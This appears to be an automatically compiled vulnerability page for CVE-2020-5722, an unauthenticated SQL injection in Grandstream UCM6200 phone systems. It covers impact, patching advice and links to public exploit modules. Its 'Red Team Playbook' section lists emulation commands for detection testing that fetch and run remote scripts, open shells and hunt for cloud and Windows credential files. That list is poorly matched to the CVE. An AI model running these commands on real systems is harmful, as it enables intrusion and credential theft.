CVE-2020-5722
Overview
This vulnerability is an unauthenticated remote SQL injection affecting the HTTP interface of the Grandstream UCM6200 Series. The root cause lies in improper sanitization of user-supplied input in HTTP requests, specifically within parameters processed by the device's web management interface. The flaw impacts the firmware's CGI endpoint responsible for password recovery and command execution functionalities, enabling injection of malicious SQL commands.
Vulnerability Description
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.
Impact
An attacker can exploit this vulnerability without any authentication or user interaction to execute arbitrary shell commands with root privileges on affected devices. This leads to full system compromise, including unauthorized access to sensitive data and control over device operations. Alternatively, attackers can inject malicious HTML into password recovery emails, facilitating phishing attacks against users. The vulnerability enables remote attackers to gain persistent, high-level access to the device, potentially disrupting telephony services and compromising enterprise communications infrastructure.
Solution
Grandstream recommends upgrading the UCM6200 Series firmware to version 1.0.19.20 or later to mitigate command injection and to version 1.0.20.17 or later to prevent HTML injection in password recovery emails. Detailed patch instructions and advisories are available in the vendor’s security bulletin and at Tenable’s advisory page (https://www.tenable.com/security/research/tra-2020-15). Users should apply these updates promptly to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the HTTP interface of the Grandstream UCM6200 series is characterized by an unauthenticated remote SQL injection flaw. This weakness allows an attacker to craft specific HTTP requests that can manipulate the underlying SQL database. By exploiting this vulnerability, an attacker can execute arbitrary SQL commands, potentially leading to unauthorized access to sensitive data or even full control over the device. The flaw is particularly severe due to its high CVSS score of 9.8, indicating critical risk, and affects versions prior to 1.0.19.20 and 1.0.20.17, which can lead to severe consequences if left unaddressed.
The attack vectors for this vulnerability are straightforward, as they require no authentication. An attacker can send specially crafted HTTP requests to the vulnerable device, which processes these requests without adequate input validation. This lack of validation allows the attacker to inject malicious SQL code into the database queries executed by the device. Exploitation scenarios could include retrieving sensitive information from the database, such as user credentials or configuration settings, or executing shell commands with root privileges. This could enable an attacker to manipulate the device's functionality, install malware, or pivot to other systems within the network.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the Grandstream UCM6200 series for communication and telephony services. Successful exploitation could lead to data breaches, loss of confidentiality, and potential disruption of services. The ability to execute commands as root could allow attackers to alter configurations, leading to service outages or unauthorized access to sensitive communications. Furthermore, the injection of HTML into password recovery emails could facilitate phishing attacks, further compromising user accounts and organizational security. The business risks associated with such incidents include reputational damage, regulatory penalties, and financial losses due to remediation efforts and potential lawsuits.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the firmware of the Grandstream UCM6200 series to the latest versions is crucial, as updates often contain patches for known vulnerabilities. Network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts, providing early warning signs of potential exploitation. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the vulnerable interface. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the unauthenticated remote SQL injection vulnerability in the Grandstream UCM6200 series poses a critical threat to organizations utilizing these devices. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention and action. By adopting robust detection and mitigation strategies, organizations can significantly reduce their risk exposure and protect their communication infrastructure from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Grandstream UCM6200 series vulnerability CVE-2020-5722. While the EPSS score has slightly decreased, indicating a modest reduction in overall exploit likelihood, our telemetry reveals a sharp increase in active exploitation events. This divergence suggests that threat actors are intensifying targeted campaigns despite a broader decline in general exploit trends. The emergence of new proof-of-concept exploits and continued availability of Metasploit modules facilitate easier weaponization, increasing the risk of successful compromise. For defenders, this shift underscores the urgency of monitoring for exploitation indicators and reinforces the criticality of timely patching. The updated activity elevates the operational threat level, as adversaries demonstrate sustained interest and capability to leverage this vulnerability for remote code execution with root privileges, potentially enabling full system takeover.
Update 2 — July 06, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-5722, reflected by a notable surge in telemetry activity. This increase corresponds with the continued availability and refinement of Metasploit modules and public proof-of-concept exploits, which lower the technical barrier for adversaries to execute remote code with root privileges on vulnerable Grandstream UCM6200 devices. Although the EPSS score shows a slight downward trend, the uptick in observed exploitation attempts signals sustained attacker interest and operational momentum. This evolving landscape elevates the threat level as it indicates adversaries are actively leveraging the vulnerability in the wild, increasing the likelihood of successful compromises. Defenders should be aware that the persistence and growth in exploitation activity underscore the criticality of vigilant monitoring and rapid incident response to mitigate potential impacts from full system takeover scenarios.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Grandstream | Ucm6200 Firmware | All |
cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
exploits/linux/http/grandstream_ucm62xx_sendemail_rce
|
jbaines-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| UCM6202 1.0.18.13 - Remote Command Injection | Jacob Baines | webapps | hardware | - | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5722 |
| tenable.com |
GitHub CVE
x_refsource_MISC
|
https://www.tenable.com/security/research/tra-2020-15 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722 |